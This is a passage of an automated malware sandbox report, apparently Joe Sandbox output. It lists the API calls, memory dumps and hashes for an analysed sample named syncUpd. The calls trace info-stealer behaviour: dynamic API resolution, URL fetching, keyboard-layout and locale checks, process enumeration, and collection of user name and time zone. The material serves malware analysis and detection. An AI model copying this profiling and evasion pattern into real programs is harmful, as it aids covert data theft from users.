                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                                                                                              • String ID: ,Xl
                                                                                                                                                                                                                                                              • API String ID: 2896919175-4168129721
                                                                                                                                                                                                                                                              • Opcode ID: 901f57252d099bfa9d9e74ad079356c761b3a8393354d98560504c99516854b1
                                                                                                                                                                                                                                                              • Instruction ID: 75bd5999431369d77bbf521c9437c267996017c7344dffd01c2583dab3973ae7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 901f57252d099bfa9d9e74ad079356c761b3a8393354d98560504c99516854b1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA01D4F150C200AFE350AF69D844B66BBFCEB84310F41847EEBC5A3390DB38A44187A9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C0B8), ref: 0041625D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF98), ref: 00416275
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D6B8), ref: 0041628E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D7C0), ref: 004162A6
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D808), ref: 004162BE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D928), ref: 004162D7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00960180), ref: 004162EF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D940), ref: 00416307
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D8F8), ref: 00416320
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D958), ref: 00416338
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D910), ref: 00416350
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C0F8), ref: 00416369
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BE98), ref: 00416381
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF18), ref: 00416399
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BFF8), ref: 004163B2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D898), ref: 004163CA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D8B0), ref: 004163E2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009601A8), ref: 004163FB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BFD8), ref: 00416413
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D8C8), ref: 0041642B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D8E0), ref: 00416444
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963EF0), ref: 0041645C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963FE0), ref: 00416474
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF38), ref: 0041648D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963F08), ref: 004164A5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009640A0), ref: 004164BD
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00964148), ref: 004164D6
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00964010), ref: 004164EE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00964130), ref: 00416506
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963ED8), ref: 0041651F
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963F68), ref: 00416537
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963F98), ref: 0041654F
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009641A8), ref: 00416568
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095FDF0), ref: 00416580
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963FF8), ref: 00416598
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963FC8), ref: 004165B1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF58), ref: 004165C9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963F38), ref: 004165E1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF78), ref: 004165FA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00964058), ref: 00416612
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963FB0), ref: 0041662A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BFB8), ref: 00416643
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C338), ref: 0041665B
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964160,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964028,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964088,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964040,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964070,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(009640B8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(009640D0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964190,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,0095C198), ref: 0041670A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,009640E8), ref: 00416722
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,0095DA60), ref: 0041673A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,00964100), ref: 00416753
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,0095C498), ref: 0041676B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,00960450), ref: 00416790
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,0095C1D8), ref: 004167A9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,009600B8), ref: 004167C1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,00963F20), ref: 004167D9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,00963F50), ref: 004167F2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,0095C138), ref: 0041680A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,0095C458), ref: 00416822
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,00964118), ref: 0041683B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,0095C1F8), ref: 0041685C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,0095C218), ref: 00416874
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,00964178), ref: 0041688D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,009641C0), ref: 004168A5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,0095C158), ref: 004168BD
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,00960338), ref: 004168E3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,00960400), ref: 004168FB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,00963F80), ref: 00416913
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,0095C178), ref: 0041692C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,0095C1B8), ref: 00416944
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,00960478), ref: 0041695C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,00964238), ref: 00416982
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,0095C238), ref: 0041699A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,0095DA90), ref: 004169B2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,00964298), ref: 004169CB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,00964268), ref: 004169E3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,0095C258), ref: 004169FB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,0095C4B8), ref: 00416A14
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,009641F0), ref: 00416A2C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,00964208), ref: 00416A44
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,0095C378), ref: 00416A66
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,00964220), ref: 00416A7E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,009641D8), ref: 00416A96
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,00964280), ref: 00416AAF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,00964250), ref: 00416AC7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E50000,0095C3D8), ref: 00416AE8
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E50000,0095C278), ref: 00416B01
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75320000,0095C2B8), ref: 00416B22
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75320000,009645C8), ref: 00416B3A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C298), ref: 00416B60
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C118), ref: 00416B78
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C2F8), ref: 00416B90
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,009644F0), ref: 00416BA9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C478), ref: 00416BC1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C2D8), ref: 00416BD9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C318), ref: 00416BF2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C358), ref: 00416C0A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E00000,00964568), ref: 00416C2B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E00000,0095DB90), ref: 00416C44
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E00000,00964460), ref: 00416C5C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E00000,00964448), ref: 00416C74
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DF0000,0095C398), ref: 00416C96
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6BBA0000,009642E0), ref: 00416CB7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6BBA0000,0095C3F8), ref: 00416CCF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6BBA0000,00964418), ref: 00416CE8
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6BBA0000,00964430), ref: 00416D00
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                                                                                              • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                                              • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                                                              • String ID: c.A$c.A
                                                                                                                                                                                                                                                              • API String ID: 3066467675-270182787
                                                                                                                                                                                                                                                              • Opcode ID: 21ffeaf44af740467b60e4b38cee9b12b10b5415320c04897876a6aa98f721d2
                                                                                                                                                                                                                                                              • Instruction ID: 9bb24127ce30fb55f1f06b14f783612db170e8ead3dba21b0de2cd79dcb36880
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21ffeaf44af740467b60e4b38cee9b12b10b5415320c04897876a6aa98f721d2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B73119F4A00218ABDB20DF54CD85BDDBBB5BB88304F5081D9B709A7280DB746AC58F9C
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                                                              • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                                                              • Opcode ID: 6fb1a9b170aca6801ce35a247184ade1557fc4ba6a5157ca9a288a7fd699c6e8
                                                                                                                                                                                                                                                              • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fb1a9b170aca6801ce35a247184ade1557fc4ba6a5157ca9a288a7fd699c6e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3491751439-0
                                                                                                                                                                                                                                                              • Opcode ID: 9ce118d042685daf90d7a6eff965731848e3dabe9ba4ff9ecad4140c240380c2
                                                                                                                                                                                                                                                              • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ce118d042685daf90d7a6eff965731848e3dabe9ba4ff9ecad4140c240380c2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00964808,00000000,?,0041D758,00000000,?,00000000,00000000,?,00964FC8,00000000), ref: 004144C0
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 362916592-0
                                                                                                                                                                                                                                                              • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                              • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00401177,0095DA10,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1206570057-0
                                                                                                                                                                                                                                                              • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                                              • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040113E
Similarity
• API ID: ExitInfoProcessSystem
• String ID:
• API String ID: 752954902-0
• Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
• Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
• Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
• Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
